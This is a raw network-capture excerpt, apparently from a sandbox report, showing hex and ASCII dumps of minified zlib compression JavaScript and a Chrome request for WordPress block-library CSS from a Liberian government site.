                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 66 29 3a 74 2e 62 69 5f 76 61 6c 69 64 3e 30 26 26 28 74 2e 70 65 6e 64 69 6e 67 5f 62 75 66 5b 74 2e 70 65 6e 64 69 6e 67 2b 2b 5d 3d 74 2e 62 69 5f 62 75 66 29 2c 74 2e 62 69 5f 62 75 66 3d 30 2c 74 2e 62 69 5f 76 61 6c 69 64 3d 30 7d 2c 55 3d 28 74 2c 65 2c 61 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 32 2a 65 2c 73 3d 32 2a 61 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 3c 74 5b 73 5d 7c 7c 74 5b 6e 5d 3d 3d 3d 74 5b 73 5d 26 26 69 5b 65 5d 3c 3d 69 5b 61 5d 7d 2c 53 3d 28 74 2c 65 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 74 2e 68 65 61 70 5b 61 5d 3b 6c 65 74 20 6e 3d 61 3c 3c 31 3b 66 6f 72 28 3b 6e 3c 3d 74 2e 68 65 61 70 5f 6c 65 6e 26 26 28 6e 3c 74 2e 68 65 61 70 5f 6c 65 6e 26 26 55 28 65 2c 74 2e 68 65 61 70 5b 6e 2b 31 5d 2c 74 2e 68 65 61 70 5b 6e
                                                                                                                        Data Ascii: f):t.bi_valid>0&&(t.pending_buf[t.pending++]=t.bi_buf),t.bi_buf=0,t.bi_valid=0},U=(t,e,a,i)=>{const n=2*e,s=2*a;return t[n]<t[s]||t[n]===t[s]&&i[e]<=i[a]},S=(t,e,a)=>{const i=t.heap[a];let n=a<<1;for(;n<=t.heap_len&&(n<t.heap_len&&U(e,t.heap[n+1],t.heap[n
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 63 2e 73 74 61 74 69 63 5f 74 72 65 65 2c 72 3d 65 2e 73 74 61 74 5f 64 65 73 63 2e 68 61 73 5f 73 74 72 65 65 2c 6c 3d 65 2e 73 74 61 74 5f 64 65 73 63 2e 65 78 74 72 61 5f 62 69 74 73 2c 6f 3d 65 2e 73 74 61 74 5f 64 65 73 63 2e 65 78 74 72 61 5f 62 61 73 65 2c 68 3d 65 2e 73 74 61 74 5f 64 65 73 63 2e 6d 61 78 5f 6c 65 6e 67 74 68 3b 6c 65 74 20 64 2c 5f 2c 66 2c 63 2c 75 2c 77 2c 62 3d 30 3b 66 6f 72 28 63 3d 30 3b 63 3c 3d 73 3b 63 2b 2b 29 74 2e 62 6c 5f 63 6f 75 6e 74 5b 63 5d 3d 30 3b 66 6f 72 28 61 5b 32 2a 74 2e 68 65 61 70 5b 74 2e 68 65 61 70 5f 6d 61 78 5d 2b 31 5d 3d 30 2c 64 3d 74 2e 68 65 61 70 5f 6d 61 78 2b 31 3b 64 3c 35 37 33 3b 64 2b 2b 29 5f 3d 74 2e 68 65 61 70 5b 64 5d 2c 63 3d 61 5b 32 2a 61 5b 32 2a 5f 2b 31 5d 2b 31 5d 2b 31 2c
                                                                                                                        Data Ascii: c.static_tree,r=e.stat_desc.has_stree,l=e.stat_desc.extra_bits,o=e.stat_desc.extra_base,h=e.stat_desc.max_length;let d,_,f,c,u,w,b=0;for(c=0;c<=s;c++)t.bl_count[c]=0;for(a[2*t.heap[t.heap_max]+1]=0,d=t.heap_max+1;d<573;d++)_=t.heap[d],c=a[2*a[2*_+1]+1]+1,
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 69 26 26 28 79 28 74 2c 61 29 2c 79 28 74 2c 7e 61 29 29 2c 74 2e 70 65 6e 64 69 6e 67 5f 62 75 66 2e 73 65 74 28 74 2e 77 69 6e 64 6f 77 2e 73 75 62 61 72 72 61 79 28 65 2c 65 2b 61 29 2c 74 2e 70 65 6e 64 69 6e 67 29 2c 74 2e 70 65 6e 64 69 6e 67 2b 3d 61 7d 29 28 74 2c 65 2c 61 2c 21 30 29 7d 3b 76 61 72 20 4e 3d 7b 5f 74 72 5f 69 6e 69 74 3a 74 3d 3e 7b 46 7c 7c 28 28 28 29 3d 3e 7b 6c 65 74 20 74 2c 65 2c 61 2c 68 2c 6b 3b 63 6f 6e 73 74 20 76 3d 6e 65 77 20 41 72 72 61 79 28 31 36 29 3b 66 6f 72 28 61 3d 30 2c 68 3d 30 3b 68 3c 32 38 3b 68 2b 2b 29 66 6f 72 28 75 5b 68 5d 3d 61 2c 74 3d 30 3b 74 3c 31 3c 3c 72 5b 68 5d 3b 74 2b 2b 29 63 5b 61 2b 2b 5d 3d 68 3b 66 6f 72 28 63 5b 61 2d 31 5d 3d 68 2c 6b 3d 30 2c 68 3d 30 3b 68 3c 31 36 3b 68 2b 2b 29
                                                                                                                        Data Ascii: i&&(y(t,a),y(t,~a)),t.pending_buf.set(t.window.subarray(e,e+a),t.pending),t.pending+=a})(t,e,a,!0)};var N={_tr_init:t=>{F||((()=>{let t,e,a,h,k;const v=new Array(16);for(a=0,h=0;h<28;h++)for(u[h]=a,t=0;t<1<<r[h];t++)c[a++]=h;for(c[a-1]=h,k=0,h=0;h<16;h++)
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 26 26 28 73 3d 72 29 29 3a 73 3d 72 3d 69 2b 35 2c 69 2b 34 3c 3d 73 26 26 2d 31 21 3d 3d 65 3f 4c 28 74 2c 65 2c 69 2c 6e 29 3a 34 3d 3d 3d 74 2e 73 74 72 61 74 65 67 79 7c 7c 72 3d 3d 3d 73 3f 28 78 28 74 2c 32 2b 28 6e 3f 31 3a 30 29 2c 33 29 2c 44 28 74 2c 64 2c 5f 29 29 3a 28 78 28 74 2c 34 2b 28 6e 3f 31 3a 30 29 2c 33 29 2c 28 28 74 2c 65 2c 61 2c 69 29 3d 3e 7b 6c 65 74 20 6e 3b 66 6f 72 28 78 28 74 2c 65 2d 32 35 37 2c 35 29 2c 78 28 74 2c 61 2d 31 2c 35 29 2c 78 28 74 2c 69 2d 34 2c 34 29 2c 6e 3d 30 3b 6e 3c 69 3b 6e 2b 2b 29 78 28 74 2c 74 2e 62 6c 5f 74 72 65 65 5b 32 2a 68 5b 6e 5d 2b 31 5d 2c 33 29 3b 49 28 74 2c 74 2e 64 79 6e 5f 6c 74 72 65 65 2c 65 2d 31 29 2c 49 28 74 2c 74 2e 64 79 6e 5f 64 74 72 65 65 2c 61 2d 31 29 7d 29 28 74 2c 74
                                                                                                                        Data Ascii: &&(s=r)):s=r=i+5,i+4<=s&&-1!==e?L(t,e,i,n):4===t.strategy||r===s?(x(t,2+(n?1:0),3),D(t,d,_)):(x(t,4+(n?1:0),3),((t,e,a,i)=>{let n;for(x(t,e-257,5),x(t,a-1,5),x(t,i-4,4),n=0;n<i;n++)x(t,t.bl_tree[2*h[n]+1],3);I(t,t.dyn_ltree,e-1),I(t,t.dyn_dtree,a-1)})(t,t
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 6c 65 20 76 65 72 73 69 6f 6e 22 7d 2c 6a 3d 7b 5a 5f 4e 4f 5f 46 4c 55 53 48 3a 30 2c 5a 5f 50 41 52 54 49 41 4c 5f 46 4c 55 53 48 3a 31 2c 5a 5f 53 59 4e 43 5f 46 4c 55 53 48 3a 32 2c 5a 5f 46 55 4c 4c 5f 46 4c 55 53 48 3a 33 2c 5a 5f 46 49 4e 49 53 48 3a 34 2c 5a 5f 42 4c 4f 43 4b 3a 35 2c 5a 5f 54 52 45 45 53 3a 36 2c 5a 5f 4f 4b 3a 30 2c 5a 5f 53 54 52 45 41 4d 5f 45 4e 44 3a 31 2c 5a 5f 4e 45 45 44 5f 44 49 43 54 3a 32 2c 5a 5f 45 52 52 4e 4f 3a 2d 31 2c 5a 5f 53 54 52 45 41 4d 5f 45 52 52 4f 52 3a 2d 32 2c 5a 5f 44 41 54 41 5f 45 52 52 4f 52 3a 2d 33 2c 5a 5f 4d 45 4d 5f 45 52 52 4f 52 3a 2d 34 2c 5a 5f 42 55 46 5f 45 52 52 4f 52 3a 2d 35 2c 5a 5f 4e 4f 5f 43 4f 4d 50 52 45 53 53 49 4f 4e 3a 30 2c 5a 5f 42 45 53 54 5f 53 50 45 45 44 3a 31 2c 5a 5f
                                                                                                                        Data Ascii: le version"},j={Z_NO_FLUSH:0,Z_PARTIAL_FLUSH:1,Z_SYNC_FLUSH:2,Z_FULL_FLUSH:3,Z_FINISH:4,Z_BLOCK:5,Z_TREES:6,Z_OK:0,Z_STREAM_END:1,Z_NEED_DICT:2,Z_ERRNO:-1,Z_STREAM_ERROR:-2,Z_DATA_ERROR:-3,Z_MEM_ERROR:-4,Z_BUF_ERROR:-5,Z_NO_COMPRESSION:0,Z_BEST_SPEED:1,Z_
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 74 2c 65 29 3d 3e 7b 74 2e 70 65 6e 64 69 6e 67 5f 62 75 66 5b 74 2e 70 65 6e 64 69 6e 67 2b 2b 5d 3d 65 3e 3e 3e 38 26 32 35 35 2c 74 2e 70 65 6e 64 69 6e 67 5f 62 75 66 5b 74 2e 70 65 6e 64 69 6e 67 2b 2b 5d 3d 32 35 35 26 65 7d 2c 41 74 3d 28 74 2c 65 2c 61 2c 69 29 3d 3e 7b 6c 65 74 20 6e 3d 74 2e 61 76 61 69 6c 5f 69 6e 3b 72 65 74 75 72 6e 20 6e 3e 69 26 26 28 6e 3d 69 29 2c 30 3d 3d 3d 6e 3f 30 3a 28 74 2e 61 76 61 69 6c 5f 69 6e 2d 3d 6e 2c 65 2e 73 65 74 28 74 2e 69 6e 70 75 74 2e 73 75 62 61 72 72 61 79 28 74 2e 6e 65 78 74 5f 69 6e 2c 74 2e 6e 65 78 74 5f 69 6e 2b 6e 29 2c 61 29 2c 31 3d 3d 3d 74 2e 73 74 61 74 65 2e 77 72 61 70 3f 74 2e 61 64 6c 65 72 3d 42 28 74 2e 61 64 6c 65 72 2c 65 2c 6e 2c 61 29 3a 32 3d 3d 3d 74 2e 73 74 61 74 65 2e 77
                                                                                                                        Data Ascii: t,e)=>{t.pending_buf[t.pending++]=e>>>8&255,t.pending_buf[t.pending++]=255&e},At=(t,e,a,i)=>{let n=t.avail_in;return n>i&&(n=i),0===n?0:(t.avail_in-=n,e.set(t.input.subarray(t.next_in,t.next_in+n),a),1===t.state.wrap?t.adler=B(t.adler,e,n,a):2===t.state.w
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 64 2c 73 29 2c 74 2e 6c 6f 6f 6b 61 68 65 61 64 2b 3d 69 2c 74 2e 6c 6f 6f 6b 61 68 65 61 64 2b 74 2e 69 6e 73 65 72 74 3e 3d 33 29 66 6f 72 28 72 3d 74 2e 73 74 72 73 74 61 72 74 2d 74 2e 69 6e 73 65 72 74 2c 74 2e 69 6e 73 5f 68 3d 74 2e 77 69 6e 64 6f 77 5b 72 5d 2c 74 2e 69 6e 73 5f 68 3d 6b 74 28 74 2c 74 2e 69 6e 73 5f 68 2c 74 2e 77 69 6e 64 6f 77 5b 72 2b 31 5d 29 3b 74 2e 69 6e 73 65 72 74 26 26 28 74 2e 69 6e 73 5f 68 3d 6b 74 28 74 2c 74 2e 69 6e 73 5f 68 2c 74 2e 77 69 6e 64 6f 77 5b 72 2b 33 2d 31 5d 29 2c 74 2e 70 72 65 76 5b 72 26 74 2e 77 5f 6d 61 73 6b 5d 3d 74 2e 68 65 61 64 5b 74 2e 69 6e 73 5f 68 5d 2c 74 2e 68 65 61 64 5b 74 2e 69 6e 73 5f 68 5d 3d 72 2c 72 2b 2b 2c 74 2e 69 6e 73 65 72 74 2d 2d 2c 21 28 74 2e 6c 6f 6f 6b 61 68 65 61
                                                                                                                        Data Ascii: d,s),t.lookahead+=i,t.lookahead+t.insert>=3)for(r=t.strstart-t.insert,t.ins_h=t.window[r],t.ins_h=kt(t,t.ins_h,t.window[r+1]);t.insert&&(t.ins_h=kt(t,t.ins_h,t.window[r+3-1]),t.prev[r&t.w_mask]=t.head[t.ins_h],t.head[t.ins_h]=r,r++,t.insert--,!(t.lookahea
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 28 74 2e 6c 6f 6f 6b 61 68 65 61 64 3c 63 74 29 7b 69 66 28 52 74 28 74 29 2c 74 2e 6c 6f 6f 6b 61 68 65 61 64 3c 63 74 26 26 65 3d 3d 3d 57 29 72 65 74 75 72 6e 20 31 3b 69 66 28 30 3d 3d 3d 74 2e 6c 6f 6f 6b 61 68 65 61 64 29 62 72 65 61 6b 7d 69 66 28 61 3d 30 2c 74 2e 6c 6f 6f 6b 61 68 65 61 64 3e 3d 33 26 26 28 74 2e 69 6e 73 5f 68 3d 6b 74 28 74 2c 74 2e 69 6e 73 5f 68 2c 74 2e 77 69 6e 64 6f 77 5b 74 2e 73 74 72 73 74 61 72 74 2b 33 2d 31 5d 29 2c 61 3d 74 2e 70 72 65 76 5b 74 2e 73 74 72 73 74 61 72 74 26 74 2e 77 5f 6d 61 73 6b 5d 3d 74 2e 68 65 61 64 5b 74 2e 69 6e 73 5f 68 5d 2c 74 2e 68 65 61 64 5b 74 2e 69 6e 73 5f 68 5d 3d 74 2e 73 74 72 73 74 61 72 74 29 2c 74 2e 70 72 65 76 5f 6c 65 6e 67 74 68 3d 74 2e 6d 61 74 63 68 5f 6c 65 6e 67 74 68
                                                                                                                        Data Ascii: (t.lookahead<ct){if(Rt(t),t.lookahead<ct&&e===W)return 1;if(0===t.lookahead)break}if(a=0,t.lookahead>=3&&(t.ins_h=kt(t,t.ins_h,t.window[t.strstart+3-1]),a=t.prev[t.strstart&t.w_mask]=t.head[t.ins_h],t.head[t.ins_h]=t.strstart),t.prev_length=t.match_length


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.74975269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC585OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:44 UTC364INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 13 Nov 2024 23:42:18 GMT
                                                                                                                        ETag: "1c012-626d3e2659f91"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 114706
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:44 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:44 UTC7828INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61
                                                                                                                        Data Ascii: @charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-a
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 74 2d 66 6f 72 6d 2d 65 6d 61 69 6c 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 75 72 6c 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 20 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 29 3a 6e 6f 74 28 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 20 74 65 78 74 61 72 65 61 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64
                                                                                                                        Data Ascii: t-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;d
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 72 65 7b 6f 70 61 63 69 74 79 3a 2e 37 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 38 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 38 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67
                                                                                                                        Data Ascii: re{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-backg
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f
                                                                                                                        Data Ascii: stom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-co
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 6d 6f 6e 74 68 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 70 75 74 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d
                                                                                                                        Data Ascii: .wp-block-form-input__input[type=datetime-local],.wp-block-form-input__input[type=datetime],.wp-block-form-input__input[type=email],.wp-block-form-input__input[type=month],.wp-block-form-input__input[type=number],.wp-block-form-input__input[type=password]
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 32 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 32 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 32 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 33 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62
                                                                                                                        Data Ascii: image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .b
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 66 61 75 6c 74 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 3a 6e 6f 74 28 23 69 6e 64 69 76 69 64 75 61 6c 2d 69 6d 61 67 65 29 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 6e 74 68 2d 6c 61 73 74 2d 63 68 69 6c 64 28 32 29 7e 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 3a 6e 6f 74 28 23 69 6e 64 69 76 69 64 75 61 6c 2d 69 6d 61 67 65 29 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 76 61 72 28 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 75 6e 73 74 61 62 6c 65 2d 67 61 6c 6c 65 72 79 2d 67 61 70 2c 20 31 36 70 78 29 2a 2e 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 2e 63 6f 6c 75 6d 6e 73 2d 64 65 66 61 75 6c 74 20 66 69 67 75 72 65 2e 77 70 2d 62
                                                                                                                        Data Ascii: fault figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-b
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 20 73 63 61 6c 65 28 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 69 67 68 74 62 6f 78 2d 7a 6f 6f 6d 2d 6f 75 74 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 20 73 63 61 6c 65 28 31 29 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 39 39 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 63 61 6c 63 28 28 2d 31 30 30 76 77 20 2b 20 76 61 72 28 2d 2d 77 70 2d 2d 6c 69 67 68 74 62 6f 78 2d 73 63 72 6f 6c 6c 62 61 72 2d 77 69 64 74 68 29 29 2f 32 20 2b 20 76 61 72 28 2d 2d 77 70 2d 2d 6c 69 67 68 74 62 6f 78 2d 69 6e 69 74 69 61 6c 2d 6c 65 66 74 2d 70 6f 73 69 74 69 6f 6e 29 29 2c 63 61 6c 63 28 2d 35 30
                                                                                                                        Data Ascii: scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(-50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)),calc(-50
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 20 73 76 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 73 74 72 6f 6b 65 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 30 37 35 65 6d 3b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 7b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 6a 75 73 74 69 66 79 3a 69 6e 69 74 69 61 6c 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 61 6c 69 67 6e 3a 66 6c 65 78 2d
                                                                                                                        Data Ascii: -navigation__submenu-icon svg{display:inline-block;stroke:currentColor;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-
